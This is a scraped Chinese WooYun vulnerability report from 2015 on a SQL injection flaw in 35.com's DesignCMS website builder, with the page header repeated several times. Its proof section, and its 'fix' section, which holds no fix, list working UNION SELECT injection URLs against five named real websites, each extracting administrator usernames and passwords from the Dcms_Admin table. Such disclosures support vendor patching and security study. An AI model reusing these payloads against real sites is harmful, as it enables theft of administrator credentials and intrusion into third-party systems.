三五通用建站SQL注入 | wooyun-2015-0118477| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0118477

漏洞标题：三五通用建站SQL注入

漏洞作者： Damo

提交时间：2015-06-05 17:50

修复时间：2015-09-03 18:38

公开时间：2015-09-03 18:38

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：6

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-06-05：细节已通知厂商并且等待厂商处理中
2015-06-05：厂商已经确认，细节仅向厂商公开
2015-06-08：细节向第三方安全合作伙伴开放
2015-07-30：细节向核心白帽子及相关领域专家公开
2015-08-09：细节向普通白帽子公开
2015-08-19：细节向实习白帽子公开
2015-09-03：细节向公众公开

简要描述：

略..

详细说明：

关键字：DMCS3.0@35.com 或 DesignCMS@35
问题出现在产品中心模块。
问题参数：产品ID，
数据库采用的是sqlite,虽然这里过滤了单引号以及分号但依然可以注入。
由于各网站的模板不同所以产品字段也不同，这里需要union一下，一下并且在后面加上注释符号 “ --”
例如：http://www.jiayuabc.com/kecheng_info.aspx?News_Id=624000000000 union select 0--&CateId=86

漏洞证明：

案例：1、http://www.vie.com.cn/productmore.aspx?CateId=312&ProductsId=24920700000%20%20union%20all%20select%20%201,Admin_name,Admin_pwd%20from%20Dcms_Admin%20%20limit%200,1;--
2、http://hfsteel.cn/productshow.aspx?cateid=89&productsid=20700000%20%20union%20all%20select%20%201,2,Admin_name,Admin_pwd%20from%20Dcms_Admin%20%20limit%200,1;--
3、http://www.senmic.com/proshow.aspx?cateid=35&productsid=570000000%20union%20select%200,Admin_name,Admin_pwd,3%20from%20Dcms_Admin%20limit%200,1;--
	
4、http://www.jonsung.com/pro_4.aspx?ProId=2720000000000%20union%20select%200,1,2,3,4,5,6,Admin_name,Admin_pwd%20from%20Dcms_Admin%20%20limit%200,1;--
5、http://pilomat.net/products_show.aspx?ProductsId=88000000%20union%20select%200,Admin_name%20from%20Dcms_Admin%20limit%200,1;--&CateID=28&ProductsCateID=28
http://pilomat.net/products_show.aspx?ProductsId=88000000%20union%20select%200,Admin_pwd%20from%20Dcms_Admin%20limit%200,1;--&CateID=28&ProductsCateID=28

修复方案：

案例：1、http://www.vie.com.cn/productmore.aspx?CateId=312&ProductsId=24920700000%20%20union%20all%20select%20%201,Admin_name,Admin_pwd%20from%20Dcms_Admin%20%20limit%200,1;--
2、http://hfsteel.cn/productshow.aspx?cateid=89&productsid=20700000%20%20union%20all%20select%20%201,2,Admin_name,Admin_pwd%20from%20Dcms_Admin%20%20limit%200,1;--
3、http://www.senmic.com/proshow.aspx?cateid=35&productsid=570000000%20union%20select%200,Admin_name,Admin_pwd,3%20from%20Dcms_Admin%20limit%200,1;--
	
4、http://www.jonsung.com/pro_4.aspx?ProId=2720000000000%20union%20select%200,1,2,3,4,5,6,Admin_name,Admin_pwd%20from%20Dcms_Admin%20%20limit%200,1;--
5、http://pilomat.net/products_show.aspx?ProductsId=88000000%20union%20select%200,Admin_name%20from%20Dcms_Admin%20limit%200,1;--&CateID=28&ProductsCateID=28
http://pilomat.net/products_show.aspx?ProductsId=88000000%20union%20select%200,Admin_pwd%20from%20Dcms_Admin%20limit%200,1;--&CateID=28&ProductsCateID=28

版权声明：转载请注明来源 Damo@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：5

确认时间：2015-06-05 18:37

厂商回复：

已安排相关人员处理中，谢谢提醒！

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0118477

漏洞标题：三五通用建站SQL注入

相关厂商：35.com

漏洞作者： Damo

提交时间：2015-06-05 17:50

修复时间：2015-09-03 18:38

公开时间：2015-09-03 18:38

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：6

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Damo@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0118477

漏洞标题：三五通用建站SQL注入

相关厂商：35.com

漏洞作者： Damo

提交时间：2015-06-05 17:50

修复时间：2015-09-03 18:38

公开时间：2015-09-03 18:38

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：6

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0118477"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Damo@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：